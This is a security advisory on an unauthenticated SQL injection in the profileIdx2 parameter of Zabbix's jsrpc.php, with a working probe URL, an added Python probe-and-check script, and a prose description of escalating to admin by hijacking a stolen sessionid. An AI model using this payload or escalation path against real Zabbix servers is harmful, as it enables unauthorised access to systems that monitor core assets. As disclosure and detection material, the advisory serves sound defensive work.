A high-risk SQL injection vulnerability in Zabbix can be exploited to obtain system-level privileges on the Zabbix server.
Vulnerability Overview
Zabbix is an open-source enterprise-level performance monitoring solution. Recently, the profileIdx2 parameter of Zabbix's jsrpc.php was found to be injectable: its value is placed unsanitised into an INSERT statement. An attacker can use this to log in to the Zabbix management interface without authorisation, and from there the script feature and similar functions make it easy to obtain operating-system-level access to the Zabbix server.
Official Website
http://www.zabbix.com
Impact
Attack cost: low
Severity: high
Authentication required: no
Affected versions: 2.2.x, 3.0.0 to 3.0.3 (other versions were not tested)
Vulnerability Testing
Append the following to the base URL of your Zabbix frontend:
jsrpc.php?type=9&method=screen.get&timestamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17
The output result is as follows (this is error-based injection: updatexml() is handed an invalid XPath expression, so a vulnerable server returns a MySQL XPATH syntax error that echoes the md5 value back, proving that the injected expression was evaluated):
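An added example, not code from the original post or from the Zabbix project, that packages the test above as an offline-checkable script: it builds the probe URL from the advisory's parameters, computes the marker MySQL would echo (md5(0x11) hashes the single byte 0x11), and checks a response body for the XPATH error carrying that marker. The host name zabbix.example.com and the sample response bodies are constructed for illustration; the fetch callback is a hypothetical hook so the check can be exercised without a live server.

```python
"""Probe builder and response check for the Zabbix jsrpc.php profileIdx2 injection."""
import hashlib
import re
from urllib.parse import urlencode

# Parameters of the advisory's test URL. profileIdx2 carries the injection: the
# value is concatenated into an INSERT, and MySQL evaluates updatexml() with an
# invalid XPath expression, which raises an error that echoes the XPath text.
PROBE_PARAMS = {
    "type": "9",
    "method": "screen.get",
    "timestamp": "1471403798083",
    "pageFile": "history.php",
    "profileIdx": "web.item.graph",
    "profileIdx2": "1 or updatexml(1,md5(0x11),1) or 1=1)#",
    "updateProfile": "true",
    "period": "3600",
    "stime": "20160817050632",
    "resourcetype": "17",
}


def expected_marker() -> str:
    """MySQL's md5(0x11) hashes the single byte 0x11, not the text "0x11"."""
    return hashlib.md5(bytes([0x11])).hexdigest()


def build_probe_url(base_url: str) -> str:
    """Return the full probe URL for a Zabbix frontend served at base_url."""
    # urlencode emits '+' for spaces and %23 for '#', as in the advisory's URL.
    return base_url.rstrip("/") + "/jsrpc.php?" + urlencode(PROBE_PARAMS)


# MySQL reports the unparsed remainder of the XPath expression, so the echoed
# marker may be the whole hash or only a suffix of it.
XPATH_ERROR_RE = re.compile(r"XPATH syntax error: '([0-9a-f]{1,32})'")


def is_vulnerable(response_body: str) -> bool:
    """True when the body carries the updatexml error with our md5 marker."""
    match = XPATH_ERROR_RE.search(response_body)
    if not match:
        return False
    echoed = match.group(1)
    # Demand a substantial suffix so an unrelated XPath error cannot match.
    return len(echoed) >= 8 and expected_marker().endswith(echoed)


def probe(base_url: str, fetch) -> bool:
    """Run the check through a caller-supplied fetch(url) -> str (hypothetical hook)."""
    return is_vulnerable(fetch(build_probe_url(base_url)))


# Constructed sample responses (not captured from a real Zabbix server).
VULNERABLE_BODY = (
    'SQL statement execution has failed "INSERT INTO profiles ..." '
    f"XPATH syntax error: '{expected_marker()}'"
)
PATCHED_BODY = '{"result":"","error":""}'

if __name__ == "__main__":
    base = "http://zabbix.example.com/zabbix"  # placeholder host
    print(build_probe_url(base))
    print("vulnerable (constructed body):", probe(base, lambda _url: VULNERABLE_BODY))
    print("vulnerable (patched body):   ", probe(base, lambda _url: PATCHED_BODY))
```

To use it against a real host, pass a fetch callback that performs the GET and returns the body; matching on the md5 marker rather than on the words "XPATH syntax error" alone avoids false positives from unrelated database errors.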
Supplement
The URL above is only a verification test.
An attacker can build on it with further crafted SQL to read data from the database, with no need to obtain or crack the administrator's password hash.
An experienced attacker can read the sessionid of an active administrator session directly from the database, derive the sid from it (Zabbix derives the sid from the sessionid by a fixed rule), and place the sessionid in the zbx_sessionid cookie to log in as administrator.
Solution
Upgrade to the latest version as soon as possible; version 3.0.4 is reported to contain the fix.
Security Prompt
A monitoring system watches an enterprise's core assets. Once an intruder controls it, it effectively hands them a foothold for further penetration into the enterprise.
Pay attention to this vulnerability and fix it as soon as possible.
Source: http://www.freebuf.com/vuls/112197.html
Original address: http://www.linuxprobe.com/zabbix-sql-bug.html